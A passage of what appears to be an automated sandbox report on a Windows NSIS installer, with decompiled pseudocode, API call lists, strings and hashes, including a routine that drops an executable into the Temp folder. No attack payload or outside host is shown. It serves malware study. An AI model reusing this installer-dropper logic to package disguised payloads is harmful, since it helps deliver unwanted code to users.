                                                                            										if(_t175 == 0) {
                                                                            											goto L68;
                                                                            										}
                                                                            										goto L40;
                                                                            									}
                                                                            									goto L31;
                                                                            								}
                                                                            								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                                                            								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                                                            									goto L29;
                                                                            								}
                                                                            								_t177 =  *((intOrPtr*)(_t198 + 8));
                                                                            								__eflags = _t177 - 0x20;
                                                                            								if(_t177 == 0x20) {
                                                                            									L28:
                                                                            									_t36 =  &_v20;
                                                                            									 *_t36 = _v20 | 0x00000004;
                                                                            									__eflags =  *_t36;
                                                                            									goto L29;
                                                                            								}
                                                                            								__eflags = _t177 - _t188;
                                                                            								if(_t177 != _t188) {
                                                                            									goto L29;
                                                                            								}
                                                                            								goto L28;
                                                                            							}
                                                                            							_t178 =  *((intOrPtr*)(_t198 + 2));
                                                                            							__eflags = _t178 - _t209;
                                                                            							if(_t178 == _t209) {
                                                                            								L23:
                                                                            								 *0x434fa0 = 1;
                                                                            								goto L24;
                                                                            							}
                                                                            							__eflags = _t178 - _t188;
                                                                            							if(_t178 != _t188) {
                                                                            								goto L24;
                                                                            							}
                                                                            							goto L23;
                                                                            						}
                                                                            					} else {
                                                                            						goto L16;
                                                                            					}
                                                                            					do {
                                                                            						L16:
                                                                            						_t198 = _t198 + 2;
                                                                            						__eflags =  *_t198 - _t209;
                                                                            					} while ( *_t198 == _t209);
                                                                            					goto L17;
                                                                            				}
                                                                            				goto L37;
                                                                            			}















































                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x00000000
                                                                            0x0040377d
                                                                            0x00403778
                                                                            0x0040377b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040377b
                                                                            0x00403714
                                                                            0x00403718
                                                                            0x0040371b
                                                                            0x00403722
                                                                            0x00403722
                                                                            0x00000000
                                                                            0x00403722
                                                                            0x0040371d
                                                                            0x00403720
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403720
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004036ee
                                                                            0x004036ee
                                                                            0x004036ef
                                                                            0x004036f0
                                                                            0x004036f0
                                                                            0x00000000
                                                                            0x004036ee
                                                                            0x00000000

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                            • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                            • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                            • CharNextW.USER32(00000000), ref: 004036D6
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403809
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                            • lstrcatW.KERNEL32 ref: 00403826
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040383A
                                                                            • lstrcatW.KERNEL32 ref: 00403842
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                            • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                            • lstrcatW.KERNEL32 ref: 00403956
                                                                            • lstrcatW.KERNEL32 ref: 00403965
                                                                              • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                            • lstrcatW.KERNEL32 ref: 00403970
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                            • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00403A3B
                                                                            • ExitProcess.KERNELBASE(?), ref: 00403A59
                                                                            • OleUninitialize.OLE32 ref: 00403A5E
                                                                            • ExitProcess.KERNEL32 ref: 00403A78
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                            • ExitProcess.KERNEL32 ref: 00403B0C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                            • API String ID: 2292928366-2607992671
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00406873(WCHAR* _a4) {
                                                                            				void* _t2;
                                                                            
                                                                            				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                                            				if(_t2 == 0xffffffff) {
                                                                            					return 0;
                                                                            				}
                                                                            				FindClose(_t2);
                                                                            				return 0x4302b8;
                                                                            			}





                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(74EDD4C4,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                            • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                            			E0040307D(void* __eflags, signed int _a4) {
                                                                            				DWORD* _v8;
                                                                            				DWORD* _v12;
                                                                            				void* _v16;
                                                                            				intOrPtr _v20;
                                                                            				char _v24;
                                                                            				intOrPtr _v28;
                                                                            				intOrPtr _v32;
                                                                            				intOrPtr _v36;
                                                                            				intOrPtr _v40;
                                                                            				signed int _v44;
                                                                            				signed int _t50;
                                                                            				void* _t53;
                                                                            				void* _t57;
                                                                            				intOrPtr* _t59;
                                                                            				long _t60;
                                                                            				signed int _t65;
                                                                            				signed int _t70;
                                                                            				signed int _t71;
                                                                            				signed int _t77;
                                                                            				intOrPtr _t80;
                                                                            				long _t82;
                                                                            				signed int _t85;
                                                                            				signed int _t87;
                                                                            				void* _t89;
                                                                            				signed int _t90;
                                                                            				signed int _t93;
                                                                            				void* _t94;
                                                                            
                                                                            				_t82 = 0;
                                                                            				_v12 = 0;
                                                                            				_v8 = 0;
                                                                            				 *0x434f0c = GetTickCount() + 0x3e8;
                                                                            				GetModuleFileNameW(0, 0x443800, 0x400);
                                                                            				_t89 = E0040602D(0x443800, 0x80000000, 3);
                                                                            				_v16 = _t89;
                                                                            				 *0x40a018 = _t89;
                                                                            				if(_t89 == 0xffffffff) {
                                                                            					return L"Error launching installer";
                                                                            				}
                                                                            				E0040653D(0x441800, 0x443800);
                                                                            				E0040653D(0x444000, E00405E58(0x441800));
                                                                            				_t50 = GetFileSize(_t89, 0);
                                                                            				__eflags = _t50;
                                                                            				 *0x42aa24 = _t50;
                                                                            				_t93 = _t50;
                                                                            				if(_t50 <= 0) {
                                                                            					L24:
                                                                            					E00403019(1);
                                                                            					__eflags =  *0x434f14 - _t82;
                                                                            					if( *0x434f14 == _t82) {
                                                                            						goto L29;
                                                                            					}
                                                                            					__eflags = _v8 - _t82;
                                                                            					if(_v8 == _t82) {
                                                                            						L28:
                                                                            						_t34 =  &_v24; // 0x40387d
                                                                            						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                                            						_t94 = _t53;
                                                                            						E004034E5( *0x434f14 + 0x1c);
                                                                            						_t35 =  &_v24; // 0x40387d
                                                                            						_push( *_t35);
                                                                            						_push(_t94);
                                                                            						_push(_t82);
                                                                            						_push(0xffffffff); // executed
                                                                            						_t57 = E004032B4(); // executed
                                                                            						__eflags = _t57 - _v24;
                                                                            						if(_t57 == _v24) {
                                                                            							__eflags = _v44 & 0x00000001;
                                                                            							 *0x434f10 = _t94;
                                                                            							 *0x434f18 =  *_t94;
                                                                            							if((_v44 & 0x00000001) != 0) {
                                                                            								 *0x434f1c =  *0x434f1c + 1;
                                                                            								__eflags =  *0x434f1c;
                                                                            							}
                                                                            							_t40 = _t94 + 0x44; // 0x44
                                                                            							_t59 = _t40;
                                                                            							_t85 = 8;
                                                                            							do {
                                                                            								_t59 = _t59 - 8;
                                                                            								 *_t59 =  *_t59 + _t94;
                                                                            								_t85 = _t85 - 1;
                                                                            								__eflags = _t85;
                                                                            							} while (_t85 != 0);
                                                                            							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                            							 *(_t94 + 0x3c) = _t60;
                                                                            							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                                            							__eflags = 0;
                                                                            							return 0;
                                                                            						}
                                                                            						goto L29;
                                                                            					}
                                                                            					E004034E5( *0x41ea18);
                                                                            					_t65 = E004034CF( &_a4, 4);
                                                                            					__eflags = _t65;
                                                                            					if(_t65 == 0) {
                                                                            						goto L29;
                                                                            					}
                                                                            					__eflags = _v12 - _a4;
                                                                            					if(_v12 != _a4) {
                                                                            						goto L29;
                                                                            					}
                                                                            					goto L28;
                                                                            				} else {
                                                                            					do {
                                                                            						_t90 = _t93;
                                                                            						asm("sbb eax, eax");
                                                                            						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                                            						__eflags = _t93 - _t70;
                                                                            						if(_t93 >= _t70) {
                                                                            							_t90 = _t70;
                                                                            						}
                                                                            						_t71 = E004034CF(0x416a18, _t90);
                                                                            						__eflags = _t71;
                                                                            						if(_t71 == 0) {
                                                                            							E00403019(1);
                                                                            							L29:
                                                                            							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                            						}
                                                                            						__eflags =  *0x434f14;
                                                                            						if( *0x434f14 != 0) {
                                                                            							__eflags = _a4 & 0x00000002;
                                                                            							if((_a4 & 0x00000002) == 0) {
                                                                            								E00403019(0);
                                                                            							}
                                                                            							goto L20;
                                                                            						}
                                                                            						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                                            						_t77 = _v44;
                                                                            						__eflags = _t77 & 0xfffffff0;
                                                                            						if((_t77 & 0xfffffff0) != 0) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v40 - 0xdeadbeef;
                                                                            						if(_v40 != 0xdeadbeef) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v28 - 0x74736e49;
                                                                            						if(_v28 != 0x74736e49) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v32 - 0x74666f73;
                                                                            						if(_v32 != 0x74666f73) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v36 - 0x6c6c754e;
                                                                            						if(_v36 != 0x6c6c754e) {
                                                                            							goto L20;
                                                                            						}
                                                                            						_a4 = _a4 | _t77;
                                                                            						_t87 =  *0x41ea18; // 0x20207
                                                                            						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                                            						_t80 = _v20;
                                                                            						__eflags = _t80 - _t93;
                                                                            						 *0x434f14 = _t87;
                                                                            						if(_t80 > _t93) {
                                                                            							goto L29;
                                                                            						}
                                                                            						__eflags = _a4 & 0x00000008;
                                                                            						if((_a4 & 0x00000008) != 0) {
                                                                            							L16:
                                                                            							_v8 = _v8 + 1;
                                                                            							_t93 = _t80 - 4;
                                                                            							__eflags = _t90 - _t93;
                                                                            							if(_t90 > _t93) {
                                                                            								_t90 = _t93;
                                                                            							}
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _a4 & 0x00000004;
                                                                            						if((_a4 & 0x00000004) != 0) {
                                                                            							break;
                                                                            						}
                                                                            						goto L16;
                                                                            						L20:
                                                                            						__eflags = _t93 -  *0x42aa24; // 0x2020b
                                                                            						if(__eflags < 0) {
                                                                            							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                                            						}
                                                                            						 *0x41ea18 =  *0x41ea18 + _t90;
                                                                            						_t93 = _t93 - _t90;
                                                                            						__eflags = _t93;
                                                                            					} while (_t93 != 0);
                                                                            					_t82 = 0;
                                                                            					__eflags = 0;
                                                                            					goto L24;
                                                                            				}
                                                                            			}































                                                                            APIs
                                                                            • GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000,?,?,?,?,?,0040387D,?), ref: 0040308E
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                            • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                            Strings
                                                                            • }8@, xrefs: 00403227, 00403242
                                                                            • soft, xrefs: 0040316B
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
                                                                            • Inst, xrefs: 00403162
                                                                            • Error launching installer, xrefs: 004030CD
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                                                                            • Null, xrefs: 00403174
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                            • API String ID: 2803837635-3947366757
                                                                            • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                            • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                            • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                            • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
                                                                            			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                            				signed int _v8;
                                                                            				int _v12;
                                                                            				intOrPtr _v16;
                                                                            				long _v20;
                                                                            				intOrPtr _v24;
                                                                            				short _v152;
                                                                            				void* _t65;
                                                                            				long _t70;
                                                                            				intOrPtr _t75;
                                                                            				long _t76;
                                                                            				void* _t78;
                                                                            				int _t88;
                                                                            				intOrPtr _t92;
                                                                            				intOrPtr _t95;
                                                                            				long _t96;
                                                                            				signed int _t97;
                                                                            				int _t98;
                                                                            				int _t99;
                                                                            				void* _t101;
                                                                            				void* _t102;
                                                                            
                                                                            				_t97 = _a16;
                                                                            				_t92 = _a12;
                                                                            				_v12 = _t97;
                                                                            				if(_t92 == 0) {
                                                                            					_v12 = 0x8000;
                                                                            				}
                                                                            				_v8 = _v8 & 0x00000000;
                                                                            				_v16 = _t92;
                                                                            				if(_t92 == 0) {
                                                                            					_v16 = 0x422a20;
                                                                            				}
                                                                            				_t62 = _a4;
                                                                            				if(_a4 >= 0) {
                                                                            					E004034E5( *0x434f58 + _t62);
                                                                            				}
                                                                            				if(E004034CF( &_a16, 4) == 0) {
                                                                            					L41:
                                                                            					_push(0xfffffffd);
                                                                            					goto L42;
                                                                            				} else {
                                                                            					if((_a19 & 0x00000080) == 0) {
                                                                            						if(_t92 != 0) {
                                                                            							if(_a16 < _t97) {
                                                                            								_t97 = _a16;
                                                                            							}
                                                                            							if(E004034CF(_t92, _t97) != 0) {
                                                                            								_v8 = _t97;
                                                                            								L44:
                                                                            								return _v8;
                                                                            							} else {
                                                                            								goto L41;
                                                                            							}
                                                                            						}
                                                                            						if(_a16 <= _t92) {
                                                                            							goto L44;
                                                                            						}
                                                                            						_t88 = _v12;
                                                                            						while(1) {
                                                                            							_t98 = _a16;
                                                                            							if(_a16 >= _t88) {
                                                                            								_t98 = _t88;
                                                                            							}
                                                                            							if(E004034CF(0x41ea20, _t98) == 0) {
                                                                            								goto L41;
                                                                            							}
                                                                            							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                                                                            								L28:
                                                                            								_push(0xfffffffe);
                                                                            								L42:
                                                                            								_pop(_t65);
                                                                            								return _t65;
                                                                            							}
                                                                            							_v8 = _v8 + _t98;
                                                                            							_a16 = _a16 - _t98;
                                                                            							if(_a16 > 0) {
                                                                            								continue;
                                                                            							}
                                                                            							goto L44;
                                                                            						}
                                                                            						goto L41;
                                                                            					}
                                                                            					_t70 = GetTickCount();
                                                                            					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                                            					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                                            					_t14 =  &_a16;
                                                                            					 *_t14 = _a16 & 0x7fffffff;
                                                                            					_v20 = _t70;
                                                                            					 *0x40ce68 = 8;
                                                                            					 *0x416a10 = 0x40ea08;
                                                                            					 *0x416a0c = 0x40ea08;
                                                                            					 *0x416a08 = 0x416a08;
                                                                            					_a4 = _a16;
                                                                            					if( *_t14 <= 0) {
                                                                            						goto L44;
                                                                            					} else {
                                                                            						goto L9;
                                                                            					}
                                                                            					while(1) {
                                                                            						L9:
                                                                            						_t99 = 0x4000;
                                                                            						if(_a16 < 0x4000) {
                                                                            							_t99 = _a16;
                                                                            						}
                                                                            						if(E004034CF(0x41ea20, _t99) == 0) {
                                                                            							goto L41;
                                                                            						}
                                                                            						_a16 = _a16 - _t99;
                                                                            						 *0x40ce58 = 0x41ea20;
                                                                            						 *0x40ce5c = _t99;
                                                                            						while(1) {
                                                                            							_t95 = _v16;
                                                                            							 *0x40ce60 = _t95;
                                                                            							 *0x40ce64 = _v12;
                                                                            							_t75 = E00406A65(0x40ce58);
                                                                            							_v24 = _t75;
                                                                            							if(_t75 < 0) {
                                                                            								break;
                                                                            							}
                                                                            							_t101 =  *0x40ce60 - _t95;
                                                                            							_t76 = GetTickCount();
                                                                            							_t96 = _t76;
                                                                            							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                            								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                            								_t102 = _t102 + 0xc;
                                                                            								E0040559F(0,  &_v152);
                                                                            								_v20 = _t96;
                                                                            							}
                                                                            							if(_t101 == 0) {
                                                                            								if(_a16 > 0) {
                                                                            									goto L9;
                                                                            								}
                                                                            								goto L44;
                                                                            							} else {
                                                                            								if(_a12 != 0) {
                                                                            									_v8 = _v8 + _t101;
                                                                            									_v12 = _v12 - _t101;
                                                                            									_v16 =  *0x40ce60;
                                                                            									L23:
                                                                            									if(_v24 != 1) {
                                                                            										continue;
                                                                            									}
                                                                            									goto L44;
                                                                            								}
                                                                            								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                                            								if(_t78 == 0) {
                                                                            									goto L28;
                                                                            								}
                                                                            								_v8 = _v8 + _t101;
                                                                            								goto L23;
                                                                            							}
                                                                            						}
                                                                            						_push(0xfffffffc);
                                                                            						goto L42;
                                                                            					}
                                                                            					goto L41;
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 0040331E
                                                                            • GetTickCount.KERNEL32(0040CE58,0041EA20,00004000), ref: 004033C5
                                                                            • MulDiv.KERNEL32 ref: 004033EE
                                                                            • wsprintfW.USER32 ref: 00403401
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: *B$ A$ A$... %d%%$NB10$}8@
                                                                            • API String ID: 551687249-1489162347
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                            				void* __esi;
                                                                            				void* _t35;
                                                                            				void* _t43;
                                                                            				void* _t45;
                                                                            				FILETIME* _t51;
                                                                            				FILETIME* _t64;
                                                                            				void* _t66;
                                                                            				signed int _t72;
                                                                            				FILETIME* _t73;
                                                                            				FILETIME* _t77;
                                                                            				signed int _t79;
                                                                            				WCHAR* _t81;
                                                                            				void* _t83;
                                                                            				void* _t84;
                                                                            				void* _t86;
                                                                            
                                                                            				_t77 = __ebx;
                                                                            				 *(_t86 - 8) = E00402DA6(0x31);
                                                                            				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                            				_t35 = E00405E83( *(_t86 - 8));
                                                                            				_push( *(_t86 - 8));
                                                                            				_t81 = L"C:\\Users";
                                                                            				if(_t35 == 0) {
                                                                            					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
                                                                            				} else {
                                                                            					E0040653D();
                                                                            				}
                                                                            				E004067C4(_t81);
                                                                            				while(1) {
                                                                            					__eflags =  *(_t86 + 8) - 3;
                                                                            					if( *(_t86 + 8) >= 3) {
                                                                            						_t66 = E00406873(_t81);
                                                                            						_t79 = 0;
                                                                            						__eflags = _t66 - _t77;
                                                                            						if(_t66 != _t77) {
                                                                            							_t73 = _t66 + 0x14;
                                                                            							__eflags = _t73;
                                                                            							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                            						}
                                                                            						asm("sbb eax, eax");
                                                                            						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                            						__eflags = _t72;
                                                                            						 *(_t86 + 8) = _t72;
                                                                            					}
                                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                                            					if( *(_t86 + 8) == _t77) {
                                                                            						E00406008(_t81);
                                                                            					}
                                                                            					__eflags =  *(_t86 + 8) - 1;
                                                                            					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                            					__eflags = _t43 - 0xffffffff;
                                                                            					 *(_t86 - 0x38) = _t43;
                                                                            					if(_t43 != 0xffffffff) {
                                                                            						break;
                                                                            					}
                                                                            					__eflags =  *(_t86 + 8) - _t77;
                                                                            					if( *(_t86 + 8) != _t77) {
                                                                            						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                                            						__eflags =  *(_t86 + 8) - 2;
                                                                            						if(__eflags == 0) {
                                                                            							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                            						}
                                                                            						L31:
                                                                            						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                                            						__eflags =  *0x434f88;
                                                                            						goto L32;
                                                                            					} else {
                                                                            						E0040653D(0x40b5f0, _t83);
                                                                            						E0040653D(_t83, _t81);
                                                                            						E0040657A(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                            						E0040653D(_t83, 0x40b5f0);
                                                                            						_t64 = E00405B9D("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                                                            						__eflags = _t64;
                                                                            						if(_t64 == 0) {
                                                                            							continue;
                                                                            						} else {
                                                                            							__eflags = _t64 == 1;
                                                                            							if(_t64 == 1) {
                                                                            								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                                            								L32:
                                                                            								_t51 = 0;
                                                                            								__eflags = 0;
                                                                            							} else {
                                                                            								_push(_t81);
                                                                            								_push(0xfffffffa);
                                                                            								E0040559F();
                                                                            								L29:
                                                                            								_t51 = 0x7fffffff;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					L33:
                                                                            					return _t51;
                                                                            				}
                                                                            				E0040559F(0xffffffea,  *(_t86 - 8));
                                                                            				 *0x434fb4 =  *0x434fb4 + 1;
                                                                            				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                            				 *0x434fb4 =  *0x434fb4 - 1;
                                                                            				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                            				_t84 = _t45;
                                                                            				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                            					L22:
                                                                            					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                            				} else {
                                                                            					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                            					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                            						goto L22;
                                                                            					}
                                                                            				}
                                                                            				CloseHandle( *(_t86 - 0x38)); // executed
                                                                            				__eflags = _t84 - _t77;
                                                                            				if(_t84 >= _t77) {
                                                                            					goto L31;
                                                                            				} else {
                                                                            					__eflags = _t84 - 0xfffffffe;
                                                                            					if(_t84 != 0xfffffffe) {
                                                                            						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                            					} else {
                                                                            						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                            						lstrcatW(_t81,  *(_t86 - 8));
                                                                            					}
                                                                            					_push(0x200010);
                                                                            					_push(_t81);
                                                                            					E00405B9D();
                                                                            					goto L29;
                                                                            				}
                                                                            				goto L33;
                                                                            			}



















                                                                            APIs
                                                                            • lstrcatW.KERNEL32 ref: 004017B0
                                                                            • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\Acly3.exe,C:\Users\user\AppData\Local\Temp\Acly3.exe,00000000,00000000,C:\Users\user\AppData\Local\Temp\Acly3.exe,00441000,?,?,00000031), ref: 004017D5
                                                                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
